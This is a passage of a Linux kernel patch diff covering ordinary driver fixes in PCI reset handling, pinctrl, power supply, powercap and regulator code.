+@@ -5051,15 +5050,6 @@ void pci_reset_secondary_bus(struct pci_dev *dev)
+ 
+ 	ctrl &= ~PCI_BRIDGE_CTL_BUS_RESET;
+ 	pci_write_config_word(dev, PCI_BRIDGE_CONTROL, ctrl);
+-
+-	/*
+-	 * Trhfa for conventional PCI is 2^25 clock cycles.
+-	 * Assuming a minimum 33MHz clock this results in a 1s
+-	 * delay before we can consider subordinate devices to
+-	 * be re-initialized.  PCIe has some ways to shorten this,
+-	 * but we don't make use of them yet.
+-	 */
+-	ssleep(1);
+ }
+ 
+ void __weak pcibios_reset_secondary_bus(struct pci_dev *dev)
+@@ -5078,7 +5068,8 @@ int pci_bridge_secondary_bus_reset(struct pci_dev *dev)
+ {
+ 	pcibios_reset_secondary_bus(dev);
+ 
+-	return pci_dev_wait(dev, "bus reset", PCIE_RESET_READY_POLL_MS);
++	return pci_bridge_wait_for_secondary_bus(dev, "bus reset",
++						 PCIE_RESET_READY_POLL_MS);
+ }
+ EXPORT_SYMBOL_GPL(pci_bridge_secondary_bus_reset);
+ 
+diff --git a/drivers/pci/pci.h b/drivers/pci/pci.h
+index 9049d07d3aaec..d2c08670a20ed 100644
+--- a/drivers/pci/pci.h
++++ b/drivers/pci/pci.h
+@@ -64,6 +64,19 @@ struct pci_cap_saved_state *pci_find_saved_ext_cap(struct pci_dev *dev,
+ #define PCI_PM_D3HOT_WAIT       10	/* msec */
+ #define PCI_PM_D3COLD_WAIT      100	/* msec */
+ 
++/*
++ * Following exit from Conventional Reset, devices must be ready within 1 sec
++ * (PCIe r6.0 sec 6.6.1).  A D3cold to D0 transition implies a Conventional
++ * Reset (PCIe r6.0 sec 5.8).
++ */
++#define PCI_RESET_WAIT		1000	/* msec */
++/*
++ * Devices may extend the 1 sec period through Request Retry Status completions
++ * (PCIe r6.0 sec 2.3.1).  The spec does not provide an upper limit, but 60 sec
++ * ought to be enough for any device to become responsive.
++ */
++#define PCIE_RESET_READY_POLL_MS 60000	/* msec */
++
+ void pci_update_current_state(struct pci_dev *dev, pci_power_t state);
+ void pci_refresh_power_state(struct pci_dev *dev);
+ int pci_power_up(struct pci_dev *dev);
+@@ -86,8 +99,9 @@ void pci_msi_init(struct pci_dev *dev);
+ void pci_msix_init(struct pci_dev *dev);
+ bool pci_bridge_d3_possible(struct pci_dev *dev);
+ void pci_bridge_d3_update(struct pci_dev *dev);
+-void pci_bridge_wait_for_secondary_bus(struct pci_dev *dev);
+ void pci_bridge_reconfigure_ltr(struct pci_dev *dev);
++int pci_bridge_wait_for_secondary_bus(struct pci_dev *dev, char *reset_type,
++				      int timeout);
+ 
+ static inline void pci_wakeup_event(struct pci_dev *dev)
+ {
+@@ -310,53 +324,36 @@ struct pci_sriov {
+  * @dev: PCI device to set new error_state
+  * @new: the state we want dev to be in
+  *
+- * Must be called with device_lock held.
++ * If the device is experiencing perm_failure, it has to remain in that state.
++ * Any other transition is allowed.
+  *
+  * Returns true if state has been changed to the requested state.
+  */
+ static inline bool pci_dev_set_io_state(struct pci_dev *dev,
+ 					pci_channel_state_t new)
+ {
+-	bool changed = false;
++	pci_channel_state_t old;
+ 
+-	device_lock_assert(&dev->dev);
+ 	switch (new) {
+ 	case pci_channel_io_perm_failure:
+-		switch (dev->error_state) {
+-		case pci_channel_io_frozen:
+-		case pci_channel_io_normal:
+-		case pci_channel_io_perm_failure:
+-			changed = true;
+-			break;
+-		}
+-		break;
++		xchg(&dev->error_state, pci_channel_io_perm_failure);
++		return true;
+ 	case pci_channel_io_frozen:
+-		switch (dev->error_state) {
+-		case pci_channel_io_frozen:
+-		case pci_channel_io_normal:
+-			changed = true;
+-			break;
+-		}
+-		break;
++		old = cmpxchg(&dev->error_state, pci_channel_io_normal,
++			      pci_channel_io_frozen);
++		return old != pci_channel_io_perm_failure;
+ 	case pci_channel_io_normal:
+-		switch (dev->error_state) {
+-		case pci_channel_io_frozen:
+-		case pci_channel_io_normal:
+-			changed = true;
+-			break;
+-		}
+-		break;
++		old = cmpxchg(&dev->error_state, pci_channel_io_frozen,
++			      pci_channel_io_normal);
++		return old != pci_channel_io_perm_failure;
++	default:
++		return false;
+ 	}
+-	if (changed)
+-		dev->error_state = new;
+-	return changed;
+ }
+ 
+ static inline int pci_dev_set_disconnected(struct pci_dev *dev, void *unused)
+ {
+-	device_lock(&dev->dev);
+ 	pci_dev_set_io_state(dev, pci_channel_io_perm_failure);
+-	device_unlock(&dev->dev);
+ 
+ 	return 0;
+ }
+diff --git a/drivers/pci/pcie/dpc.c b/drivers/pci/pcie/dpc.c
+index f5ffea17c7f87..a5d7c69b764e0 100644
+--- a/drivers/pci/pcie/dpc.c
++++ b/drivers/pci/pcie/dpc.c
+@@ -170,8 +170,8 @@ pci_ers_result_t dpc_reset_link(struct pci_dev *pdev)
+ 	pci_write_config_word(pdev, cap + PCI_EXP_DPC_STATUS,
+ 			      PCI_EXP_DPC_STATUS_TRIGGER);
+ 
+-	if (!pcie_wait_for_link(pdev, true)) {
+-		pci_info(pdev, "Data Link Layer Link Active not set in 1000 msec\n");
++	if (pci_bridge_wait_for_secondary_bus(pdev, "DPC",
++					      PCIE_RESET_READY_POLL_MS)) {
+ 		clear_bit(PCI_DPC_RECOVERED, &pdev->priv_flags);
+ 		ret = PCI_ERS_RESULT_DISCONNECT;
+ 	} else {
+diff --git a/drivers/pci/probe.c b/drivers/pci/probe.c
+index 1779582fb5007..5988584825482 100644
+--- a/drivers/pci/probe.c
++++ b/drivers/pci/probe.c
+@@ -996,7 +996,7 @@ static int pci_register_host_bridge(struct pci_host_bridge *bridge)
+ 	resource_list_for_each_entry_safe(window, n, &resources) {
+ 		offset = window->offset;
+ 		res = window->res;
+-		if (!res->end)
++		if (!res->flags && !res->start && !res->end)
+ 			continue;
+ 
+ 		list_move_tail(&window->node, &bridge->windows);
+diff --git a/drivers/pci/quirks.c b/drivers/pci/quirks.c
+index 285acc4aaccc1..20ac67d590348 100644
+--- a/drivers/pci/quirks.c
++++ b/drivers/pci/quirks.c
+@@ -5340,6 +5340,7 @@ static void quirk_no_flr(struct pci_dev *dev)
+ DECLARE_PCI_FIXUP_EARLY(PCI_VENDOR_ID_AMD, 0x1487, quirk_no_flr);
+ DECLARE_PCI_FIXUP_EARLY(PCI_VENDOR_ID_AMD, 0x148c, quirk_no_flr);
+ DECLARE_PCI_FIXUP_EARLY(PCI_VENDOR_ID_AMD, 0x149c, quirk_no_flr);
++DECLARE_PCI_FIXUP_EARLY(PCI_VENDOR_ID_AMD, 0x7901, quirk_no_flr);
+ DECLARE_PCI_FIXUP_EARLY(PCI_VENDOR_ID_INTEL, 0x1502, quirk_no_flr);
+ DECLARE_PCI_FIXUP_EARLY(PCI_VENDOR_ID_INTEL, 0x1503, quirk_no_flr);
+ 
+diff --git a/drivers/pci/switch/switchtec.c b/drivers/pci/switch/switchtec.c
+index 75be4fe225090..0c1faa6c1973a 100644
+--- a/drivers/pci/switch/switchtec.c
++++ b/drivers/pci/switch/switchtec.c
+@@ -606,21 +606,20 @@ static ssize_t switchtec_dev_read(struct file *filp, char __user *data,
+ 	rc = copy_to_user(data, &stuser->return_code,
+ 			  sizeof(stuser->return_code));
+ 	if (rc) {
+-		rc = -EFAULT;
+-		goto out;
++		mutex_unlock(&stdev->mrpc_mutex);
++		return -EFAULT;
+ 	}
+ 
+ 	data += sizeof(stuser->return_code);
+ 	rc = copy_to_user(data, &stuser->data,
+ 			  size - sizeof(stuser->return_code));
+ 	if (rc) {
+-		rc = -EFAULT;
+-		goto out;
++		mutex_unlock(&stdev->mrpc_mutex);
++		return -EFAULT;
+ 	}
+ 
+ 	stuser_set_state(stuser, MRPC_IDLE);
+ 
+-out:
+ 	mutex_unlock(&stdev->mrpc_mutex);
+ 
+ 	if (stuser->status == SWITCHTEC_MRPC_STATUS_DONE ||
+diff --git a/drivers/phy/mediatek/phy-mtk-io.h b/drivers/phy/mediatek/phy-mtk-io.h
+index d20ad5e5be814..58f06db822cb0 100644
+--- a/drivers/phy/mediatek/phy-mtk-io.h
++++ b/drivers/phy/mediatek/phy-mtk-io.h
+@@ -39,8 +39,8 @@ static inline void mtk_phy_update_bits(void __iomem *reg, u32 mask, u32 val)
+ /* field @mask shall be constant and continuous */
+ #define mtk_phy_update_field(reg, mask, val) \
+ ({ \
+-	typeof(mask) mask_ = (mask);	\
+-	mtk_phy_update_bits(reg, mask_, FIELD_PREP(mask_, val)); \
++	BUILD_BUG_ON_MSG(!__builtin_constant_p(mask), "mask is not constant"); \
++	mtk_phy_update_bits(reg, mask, FIELD_PREP(mask, val)); \
+ })
+ 
+ #endif
+diff --git a/drivers/phy/rockchip/phy-rockchip-typec.c b/drivers/phy/rockchip/phy-rockchip-typec.c
+index d76440ae10ff4..6aea512e5d4ee 100644
+--- a/drivers/phy/rockchip/phy-rockchip-typec.c
++++ b/drivers/phy/rockchip/phy-rockchip-typec.c
+@@ -821,10 +821,10 @@ static int tcphy_get_mode(struct rockchip_typec_phy *tcphy)
+ 	mode = MODE_DFP_USB;
+ 	id = EXTCON_USB_HOST;
+ 
+-	if (ufp) {
++	if (ufp > 0) {
+ 		mode = MODE_UFP_USB;
+ 		id = EXTCON_USB;
+-	} else if (dp) {
++	} else if (dp > 0) {
+ 		mode = MODE_DFP_DP;
+ 		id = EXTCON_DISP_DP;
+ 
+diff --git a/drivers/pinctrl/bcm/pinctrl-bcm2835.c b/drivers/pinctrl/bcm/pinctrl-bcm2835.c
+index 7857e612a1008..c7cdccdb4332a 100644
+--- a/drivers/pinctrl/bcm/pinctrl-bcm2835.c
++++ b/drivers/pinctrl/bcm/pinctrl-bcm2835.c
+@@ -363,8 +363,6 @@ static int bcm2835_of_gpio_ranges_fallback(struct gpio_chip *gc,
+ {
+ 	struct pinctrl_dev *pctldev = of_pinctrl_get(np);
+ 
+-	of_node_put(np);
+-
+ 	if (!pctldev)
+ 		return 0;
+ 
+diff --git a/drivers/pinctrl/mediatek/pinctrl-paris.c b/drivers/pinctrl/mediatek/pinctrl-paris.c
+index 475f4172d5085..37761a8e7a18f 100644
+--- a/drivers/pinctrl/mediatek/pinctrl-paris.c
++++ b/drivers/pinctrl/mediatek/pinctrl-paris.c
+@@ -640,7 +640,7 @@ static int mtk_hw_get_value_wrap(struct mtk_pinctrl *hw, unsigned int gpio, int
+ ssize_t mtk_pctrl_show_one_pin(struct mtk_pinctrl *hw,
+ 	unsigned int gpio, char *buf, unsigned int buf_len)
+ {
+-	int pinmux, pullup, pullen, len = 0, r1 = -1, r0 = -1, rsel = -1;
++	int pinmux, pullup = 0, pullen = 0, len = 0, r1 = -1, r0 = -1, rsel = -1;
+ 	const struct mtk_pin_desc *desc;
+ 	u32 try_all_type = 0;
+ 
+@@ -717,7 +717,7 @@ static void mtk_pctrl_dbg_show(struct pinctrl_dev *pctldev, struct seq_file *s,
+ 			  unsigned int gpio)
+ {
+ 	struct mtk_pinctrl *hw = pinctrl_dev_get_drvdata(pctldev);
+-	char buf[PIN_DBG_BUF_SZ];
++	char buf[PIN_DBG_BUF_SZ] = { 0 };
+ 
+ 	(void)mtk_pctrl_show_one_pin(hw, gpio, buf, PIN_DBG_BUF_SZ);
+ 
+diff --git a/drivers/pinctrl/pinctrl-at91-pio4.c b/drivers/pinctrl/pinctrl-at91-pio4.c
+index 39b233f73e132..373eed8bc4be9 100644
+--- a/drivers/pinctrl/pinctrl-at91-pio4.c
++++ b/drivers/pinctrl/pinctrl-at91-pio4.c
+@@ -1149,8 +1149,8 @@ static int atmel_pinctrl_probe(struct platform_device *pdev)
+ 
+ 		pin_desc[i].number = i;
+ 		/* Pin naming convention: P(bank_name)(bank_pin_number). */
+-		pin_desc[i].name = kasprintf(GFP_KERNEL, "P%c%d",
+-					     bank + 'A', line);
++		pin_desc[i].name = devm_kasprintf(&pdev->dev, GFP_KERNEL, "P%c%d",
++						  bank + 'A', line);
+ 
+ 		group->name = group_names[i] = pin_desc[i].name;
+ 		group->pin = pin_desc[i].number;
+diff --git a/drivers/pinctrl/pinctrl-at91.c b/drivers/pinctrl/pinctrl-at91.c
+index 1e1813d7c5508..c405296e49896 100644
+--- a/drivers/pinctrl/pinctrl-at91.c
++++ b/drivers/pinctrl/pinctrl-at91.c
+@@ -1885,7 +1885,7 @@ static int at91_gpio_probe(struct platform_device *pdev)
+ 	}
+ 
+ 	for (i = 0; i < chip->ngpio; i++)
+-		names[i] = kasprintf(GFP_KERNEL, "pio%c%d", alias_idx + 'A', i);
++		names[i] = devm_kasprintf(&pdev->dev, GFP_KERNEL, "pio%c%d", alias_idx + 'A', i);
+ 
+ 	chip->names = (const char *const *)names;
+ 
+diff --git a/drivers/pinctrl/pinctrl-rockchip.c b/drivers/pinctrl/pinctrl-rockchip.c
+index 5eeac92f610a0..0276b52f37168 100644
+--- a/drivers/pinctrl/pinctrl-rockchip.c
++++ b/drivers/pinctrl/pinctrl-rockchip.c
+@@ -3045,6 +3045,7 @@ static int rockchip_pinctrl_parse_groups(struct device_node *np,
+ 		np_config = of_find_node_by_phandle(be32_to_cpup(phandle));
+ 		ret = pinconf_generic_parse_dt_config(np_config, NULL,
+ 				&grp->data[j].configs, &grp->data[j].nconfigs);
++		of_node_put(np_config);
+ 		if (ret)
+ 			return ret;
+ 	}
+diff --git a/drivers/pinctrl/qcom/pinctrl-msm8976.c b/drivers/pinctrl/qcom/pinctrl-msm8976.c
+index ec43edf9b660a..e11d845847190 100644
+--- a/drivers/pinctrl/qcom/pinctrl-msm8976.c
++++ b/drivers/pinctrl/qcom/pinctrl-msm8976.c
+@@ -733,7 +733,7 @@ static const char * const codec_int2_groups[] = {
+ 	"gpio74",
+ };
+ static const char * const wcss_bt_groups[] = {
+-	"gpio39", "gpio47", "gpio88",
++	"gpio39", "gpio47", "gpio48",
+ };
+ static const char * const sdc3_groups[] = {
+ 	"gpio39", "gpio40", "gpio41",
+@@ -958,9 +958,9 @@ static const struct msm_pingroup msm8976_groups[] = {
+ 	PINGROUP(37, NA, NA, NA, qdss_tracedata_b, NA, NA, NA, NA, NA),
+ 	PINGROUP(38, NA, NA, NA, NA, NA, NA, NA, qdss_tracedata_b, NA),
+ 	PINGROUP(39, wcss_bt, sdc3, NA, qdss_tracedata_a, NA, NA, NA, NA, NA),
+-	PINGROUP(40, wcss_wlan, sdc3, NA, qdss_tracedata_a, NA, NA, NA, NA, NA),
+-	PINGROUP(41, wcss_wlan, sdc3, NA, qdss_tracedata_a, NA, NA, NA, NA, NA),
+-	PINGROUP(42, wcss_wlan, sdc3, NA, qdss_tracedata_a, NA, NA, NA, NA, NA),
++	PINGROUP(40, wcss_wlan2, sdc3, NA, qdss_tracedata_a, NA, NA, NA, NA, NA),
++	PINGROUP(41, wcss_wlan1, sdc3, NA, qdss_tracedata_a, NA, NA, NA, NA, NA),
++	PINGROUP(42, wcss_wlan0, sdc3, NA, qdss_tracedata_a, NA, NA, NA, NA, NA),
+ 	PINGROUP(43, wcss_wlan, sdc3, NA, NA, qdss_tracedata_a, NA, NA, NA, NA),
+ 	PINGROUP(44, wcss_wlan, sdc3, NA, NA, NA, NA, NA, NA, NA),
+ 	PINGROUP(45, wcss_fm, NA, qdss_tracectl_a, NA, NA, NA, NA, NA, NA),
+diff --git a/drivers/pinctrl/renesas/pinctrl-rzg2l.c b/drivers/pinctrl/renesas/pinctrl-rzg2l.c
+index 5aa3836dbc226..6f762097557af 100644
+--- a/drivers/pinctrl/renesas/pinctrl-rzg2l.c
++++ b/drivers/pinctrl/renesas/pinctrl-rzg2l.c
+@@ -130,6 +130,7 @@ struct rzg2l_dedicated_configs {
+ struct rzg2l_pinctrl_data {
+ 	const char * const *port_pins;
+ 	const u32 *port_pin_configs;
++	unsigned int n_ports;
+ 	struct rzg2l_dedicated_configs *dedicated_pins;
+ 	unsigned int n_port_pins;
+ 	unsigned int n_dedicated_pins;
+@@ -1124,7 +1125,7 @@ static struct {
+ 	}
+ };
+ 
+-static int rzg2l_gpio_get_gpioint(unsigned int virq)
++static int rzg2l_gpio_get_gpioint(unsigned int virq, const struct rzg2l_pinctrl_data *data)
+ {
+ 	unsigned int gpioint;
+ 	unsigned int i;
+@@ -1133,13 +1134,13 @@ static int rzg2l_gpio_get_gpioint(unsigned int virq)
+ 	port = virq / 8;
+ 	bit = virq % 8;
+ 
+-	if (port >= ARRAY_SIZE(rzg2l_gpio_configs) ||
+-	    bit >= RZG2L_GPIO_PORT_GET_PINCNT(rzg2l_gpio_configs[port]))
++	if (port >= data->n_ports ||
++	    bit >= RZG2L_GPIO_PORT_GET_PINCNT(data->port_pin_configs[port]))
+ 		return -EINVAL;
+ 
+ 	gpioint = bit;
+ 	for (i = 0; i < port; i++)
+-		gpioint += RZG2L_GPIO_PORT_GET_PINCNT(rzg2l_gpio_configs[i]);
++		gpioint += RZG2L_GPIO_PORT_GET_PINCNT(data->port_pin_configs[i]);
+ 
+ 	return gpioint;
+ }
+@@ -1239,7 +1240,7 @@ static int rzg2l_gpio_child_to_parent_hwirq(struct gpio_chip *gc,
+ 	unsigned long flags;
+ 	int gpioint, irq;
+ 
+-	gpioint = rzg2l_gpio_get_gpioint(child);
++	gpioint = rzg2l_gpio_get_gpioint(child, pctrl->data);
+ 	if (gpioint < 0)
+ 		return gpioint;
+ 
+@@ -1313,8 +1314,8 @@ static void rzg2l_init_irq_valid_mask(struct gpio_chip *gc,
+ 		port = offset / 8;
+ 		bit = offset % 8;
+ 
+-		if (port >= ARRAY_SIZE(rzg2l_gpio_configs) ||
+-		    bit >= RZG2L_GPIO_PORT_GET_PINCNT(rzg2l_gpio_configs[port]))
++		if (port >= pctrl->data->n_ports ||
++		    bit >= RZG2L_GPIO_PORT_GET_PINCNT(pctrl->data->port_pin_configs[port]))
+ 			clear_bit(offset, valid_mask);
+ 	}
+ }
+@@ -1519,6 +1520,7 @@ static int rzg2l_pinctrl_probe(struct platform_device *pdev)
+ static struct rzg2l_pinctrl_data r9a07g043_data = {
+ 	.port_pins = rzg2l_gpio_names,
+ 	.port_pin_configs = r9a07g043_gpio_configs,
++	.n_ports = ARRAY_SIZE(r9a07g043_gpio_configs),
+ 	.dedicated_pins = rzg2l_dedicated_pins.common,
+ 	.n_port_pins = ARRAY_SIZE(r9a07g043_gpio_configs) * RZG2L_PINS_PER_PORT,
+ 	.n_dedicated_pins = ARRAY_SIZE(rzg2l_dedicated_pins.common),
+@@ -1527,6 +1529,7 @@ static struct rzg2l_pinctrl_data r9a07g043_data = {
+ static struct rzg2l_pinctrl_data r9a07g044_data = {
+ 	.port_pins = rzg2l_gpio_names,
+ 	.port_pin_configs = rzg2l_gpio_configs,
++	.n_ports = ARRAY_SIZE(rzg2l_gpio_configs),
+ 	.dedicated_pins = rzg2l_dedicated_pins.common,
+ 	.n_port_pins = ARRAY_SIZE(rzg2l_gpio_names),
+ 	.n_dedicated_pins = ARRAY_SIZE(rzg2l_dedicated_pins.common) +
+diff --git a/drivers/pinctrl/stm32/pinctrl-stm32.c b/drivers/pinctrl/stm32/pinctrl-stm32.c
+index 1cddca506ad7e..cb33a23ab0c11 100644
+--- a/drivers/pinctrl/stm32/pinctrl-stm32.c
++++ b/drivers/pinctrl/stm32/pinctrl-stm32.c
+@@ -1382,6 +1382,7 @@ static struct irq_domain *stm32_pctrl_get_irq_domain(struct platform_device *pde
+ 		return ERR_PTR(-ENXIO);
+ 
+ 	domain = irq_find_host(parent);
++	of_node_put(parent);
+ 	if (!domain)
+ 		/* domain not registered yet */
+ 		return ERR_PTR(-EPROBE_DEFER);
+diff --git a/drivers/platform/chrome/cros_ec_typec.c b/drivers/platform/chrome/cros_ec_typec.c
+index 001b0de95a46e..d1714b5d085be 100644
+--- a/drivers/platform/chrome/cros_ec_typec.c
++++ b/drivers/platform/chrome/cros_ec_typec.c
+@@ -27,7 +27,7 @@
+ #define DRV_NAME "cros-ec-typec"
+ 
+ #define DP_PORT_VDO	(DP_CONF_SET_PIN_ASSIGN(BIT(DP_PIN_ASSIGN_C) | BIT(DP_PIN_ASSIGN_D)) | \
+-				DP_CAP_DFP_D)
++				DP_CAP_DFP_D | DP_CAP_RECEPTACLE)
+ 
+ /* Supported alt modes. */
+ enum {
+diff --git a/drivers/platform/x86/dell/dell-wmi-ddv.c b/drivers/platform/x86/dell/dell-wmi-ddv.c
+index 2bb449845d143..9cb6ae42dbdc8 100644
+--- a/drivers/platform/x86/dell/dell-wmi-ddv.c
++++ b/drivers/platform/x86/dell/dell-wmi-ddv.c
+@@ -26,7 +26,8 @@
+ 
+ #define DRIVER_NAME	"dell-wmi-ddv"
+ 
+-#define DELL_DDV_SUPPORTED_INTERFACE 2
++#define DELL_DDV_SUPPORTED_VERSION_MIN	2
++#define DELL_DDV_SUPPORTED_VERSION_MAX	3
+ #define DELL_DDV_GUID	"8A42EA14-4F2A-FD45-6422-0087F7A7E608"
+ 
+ #define DELL_EPPID_LENGTH	20
+@@ -49,6 +50,7 @@ enum dell_ddv_method {
+ 	DELL_DDV_BATTERY_RAW_ANALYTICS_START	= 0x0E,
+ 	DELL_DDV_BATTERY_RAW_ANALYTICS		= 0x0F,
+ 	DELL_DDV_BATTERY_DESIGN_VOLTAGE		= 0x10,
++	DELL_DDV_BATTERY_RAW_ANALYTICS_A_BLOCK	= 0x11, /* version 3 */
+ 
+ 	DELL_DDV_INTERFACE_VERSION		= 0x12,
+ 
+@@ -340,7 +342,7 @@ static int dell_wmi_ddv_probe(struct wmi_device *wdev, const void *context)
+ 		return ret;
+ 
+ 	dev_dbg(&wdev->dev, "WMI interface version: %d\n", version);
+-	if (version != DELL_DDV_SUPPORTED_INTERFACE)
++	if (version < DELL_DDV_SUPPORTED_VERSION_MIN || version > DELL_DDV_SUPPORTED_VERSION_MAX)
+ 		return -ENODEV;
+ 
+ 	data = devm_kzalloc(&wdev->dev, sizeof(*data), GFP_KERNEL);
+diff --git a/drivers/power/supply/power_supply_core.c b/drivers/power/supply/power_supply_core.c
+index 7c790c41e2fe3..cc5b2e22b42ac 100644
+--- a/drivers/power/supply/power_supply_core.c
++++ b/drivers/power/supply/power_supply_core.c
+@@ -1186,83 +1186,6 @@ static void psy_unregister_thermal(struct power_supply *psy)
+ 	thermal_zone_device_unregister(psy->tzd);
+ }
+ 
+-/* thermal cooling device callbacks */
+-static int ps_get_max_charge_cntl_limit(struct thermal_cooling_device *tcd,
+-					unsigned long *state)
+-{
+-	struct power_supply *psy;
+-	union power_supply_propval val;
+-	int ret;
+-
+-	psy = tcd->devdata;
+-	ret = power_supply_get_property(psy,
+-			POWER_SUPPLY_PROP_CHARGE_CONTROL_LIMIT_MAX, &val);
+-	if (ret)
+-		return ret;
+-
+-	*state = val.intval;
+-
+-	return ret;
+-}
+-
+-static int ps_get_cur_charge_cntl_limit(struct thermal_cooling_device *tcd,
+-					unsigned long *state)
+-{
+-	struct power_supply *psy;
+-	union power_supply_propval val;
+-	int ret;
+-
+-	psy = tcd->devdata;
+-	ret = power_supply_get_property(psy,
+-			POWER_SUPPLY_PROP_CHARGE_CONTROL_LIMIT, &val);
+-	if (ret)
+-		return ret;
+-
+-	*state = val.intval;
+-
+-	return ret;
+-}
+-
+-static int ps_set_cur_charge_cntl_limit(struct thermal_cooling_device *tcd,
+-					unsigned long state)
+-{
+-	struct power_supply *psy;
+-	union power_supply_propval val;
+-	int ret;
+-
+-	psy = tcd->devdata;
+-	val.intval = state;
+-	ret = psy->desc->set_property(psy,
+-		POWER_SUPPLY_PROP_CHARGE_CONTROL_LIMIT, &val);
+-
+-	return ret;
+-}
+-
+-static const struct thermal_cooling_device_ops psy_tcd_ops = {
+-	.get_max_state = ps_get_max_charge_cntl_limit,
+-	.get_cur_state = ps_get_cur_charge_cntl_limit,
+-	.set_cur_state = ps_set_cur_charge_cntl_limit,
+-};
+-
+-static int psy_register_cooler(struct power_supply *psy)
+-{
+-	/* Register for cooling device if psy can control charging */
+-	if (psy_has_property(psy->desc, POWER_SUPPLY_PROP_CHARGE_CONTROL_LIMIT)) {
+-		psy->tcd = thermal_cooling_device_register(
+-			(char *)psy->desc->name,
+-			psy, &psy_tcd_ops);
+-		return PTR_ERR_OR_ZERO(psy->tcd);
+-	}
+-
+-	return 0;
+-}
+-
+-static void psy_unregister_cooler(struct power_supply *psy)
+-{
+-	if (IS_ERR_OR_NULL(psy->tcd))
+-		return;
+-	thermal_cooling_device_unregister(psy->tcd);
+-}
+ #else
+ static int psy_register_thermal(struct power_supply *psy)
+ {
+@@ -1272,15 +1195,6 @@ static int psy_register_thermal(struct power_supply *psy)
+ static void psy_unregister_thermal(struct power_supply *psy)
+ {
+ }
+-
+-static int psy_register_cooler(struct power_supply *psy)
+-{
+-	return 0;
+-}
+-
+-static void psy_unregister_cooler(struct power_supply *psy)
+-{
+-}
+ #endif
+ 
+ static struct power_supply *__must_check
+@@ -1354,10 +1268,6 @@ __power_supply_register(struct device *parent,
+ 	if (rc)
+ 		goto register_thermal_failed;
+ 
+-	rc = psy_register_cooler(psy);
+-	if (rc)
+-		goto register_cooler_failed;
+-
+ 	rc = power_supply_create_triggers(psy);
+ 	if (rc)
+ 		goto create_triggers_failed;
+@@ -1387,8 +1297,6 @@ __power_supply_register(struct device *parent,
+ add_hwmon_sysfs_failed:
+ 	power_supply_remove_triggers(psy);
+ create_triggers_failed:
+-	psy_unregister_cooler(psy);
+-register_cooler_failed:
+ 	psy_unregister_thermal(psy);
+ register_thermal_failed:
+ wakeup_init_failed:
+@@ -1540,7 +1448,6 @@ void power_supply_unregister(struct power_supply *psy)
+ 	sysfs_remove_link(&psy->dev.kobj, "powers");
+ 	power_supply_remove_hwmon_sysfs(psy);
+ 	power_supply_remove_triggers(psy);
+-	psy_unregister_cooler(psy);
+ 	psy_unregister_thermal(psy);
+ 	device_init_wakeup(&psy->dev, false);
+ 	device_unregister(&psy->dev);
+diff --git a/drivers/powercap/powercap_sys.c b/drivers/powercap/powercap_sys.c
+index 1f968353d4799..e180dee0f83d0 100644
+--- a/drivers/powercap/powercap_sys.c
++++ b/drivers/powercap/powercap_sys.c
+@@ -530,9 +530,6 @@ struct powercap_zone *powercap_register_zone(
+ 	power_zone->name = kstrdup(name, GFP_KERNEL);
+ 	if (!power_zone->name)
+ 		goto err_name_alloc;
+-	dev_set_name(&power_zone->dev, "%s:%x",
+-					dev_name(power_zone->dev.parent),
+-					power_zone->id);
+ 	power_zone->constraints = kcalloc(nr_constraints,
+ 					  sizeof(*power_zone->constraints),
+ 					  GFP_KERNEL);
+@@ -555,9 +552,16 @@ struct powercap_zone *powercap_register_zone(
+ 	power_zone->dev_attr_groups[0] = &power_zone->dev_zone_attr_group;
+ 	power_zone->dev_attr_groups[1] = NULL;
+ 	power_zone->dev.groups = power_zone->dev_attr_groups;
++	dev_set_name(&power_zone->dev, "%s:%x",
++					dev_name(power_zone->dev.parent),
++					power_zone->id);
+ 	result = device_register(&power_zone->dev);
+-	if (result)
+-		goto err_dev_ret;
++	if (result) {
++		put_device(&power_zone->dev);
++		mutex_unlock(&control_type->lock);
++
++		return ERR_PTR(result);
++	}
+ 
+ 	control_type->nr_zones++;
+ 	mutex_unlock(&control_type->lock);
+diff --git a/drivers/regulator/core.c b/drivers/regulator/core.c
+index ae69e493913da..4fcd36055b025 100644
+--- a/drivers/regulator/core.c
++++ b/drivers/regulator/core.c
+@@ -1584,7 +1584,7 @@ static int set_machine_constraints(struct regulator_dev *rdev)
+ 	}
+ 
+ 	if (rdev->desc->off_on_delay)
+-		rdev->last_off = ktime_get();
++		rdev->last_off = ktime_get_boottime();
+ 
+ 	/* If the constraints say the regulator should be on at this point
+ 	 * and we have control then make sure it is enabled.
+@@ -2673,7 +2673,7 @@ static int _regulator_do_enable(struct regulator_dev *rdev)
+ 		 * this regulator was disabled.
+ 		 */
+ 		ktime_t end = ktime_add_us(rdev->last_off, rdev->desc->off_on_delay);
+-		s64 remaining = ktime_us_delta(end, ktime_get());
++		s64 remaining = ktime_us_delta(end, ktime_get_boottime());
+ 
+ 		if (remaining > 0)
+ 			_regulator_delay_helper(remaining);
+@@ -2912,7 +2912,7 @@ static int _regulator_do_disable(struct regulator_dev *rdev)
+ 	}
+ 
+ 	if (rdev->desc->off_on_delay)
+-		rdev->last_off = ktime_get();
++		rdev->last_off = ktime_get_boottime();
+ 
+ 	trace_regulator_disable_complete(rdev_get_name(rdev));
+ 
+diff --git a/drivers/regulator/max77802-regulator.c b/drivers/regulator/max77802-regulator.c
+index 21e0eb0f43f94..befe5f319819b 100644
+--- a/drivers/regulator/max77802-regulator.c
++++ b/drivers/regulator/max77802-regulator.c
+@@ -94,9 +94,11 @@ static int max77802_set_suspend_disable(struct regulator_dev *rdev)
+ {
+ 	unsigned int val = MAX77802_OFF_PWRREQ;
+ 	struct max77802_regulator_prv *max77802 = rdev_get_drvdata(rdev);
+-	int id = rdev_get_id(rdev);
++	unsigned int id = rdev_get_id(rdev);
+ 	int shift = max77802_get_opmode_shift(id);
+ 
++	if (WARN_ON_ONCE(id >= ARRAY_SIZE(max77802->opmode)))
++		return -EINVAL;
+ 	max77802->opmode[id] = val;
+ 	return regmap_update_bits(rdev->regmap, rdev->desc->enable_reg,
+ 				  rdev->desc->enable_mask, val << shift);
+@@ -110,7 +112,7 @@ static int max77802_set_suspend_disable(struct regulator_dev *rdev)
+ static int max77802_set_mode(struct regulator_dev *rdev, unsigned int mode)
+ {
+ 	struct max77802_regulator_prv *max77802 = rdev_get_drvdata(rdev);
+-	int id = rdev_get_id(rdev);
++	unsigned int id = rdev_get_id(rdev);
+ 	unsigned int val;
+ 	int shift = max77802_get_opmode_shift(id);
+ 
+@@ -127,6 +129,9 @@ static int max77802_set_mode(struct regulator_dev *rdev, unsigned int mode)
+ 		return -EINVAL;
+ 	}
+ 
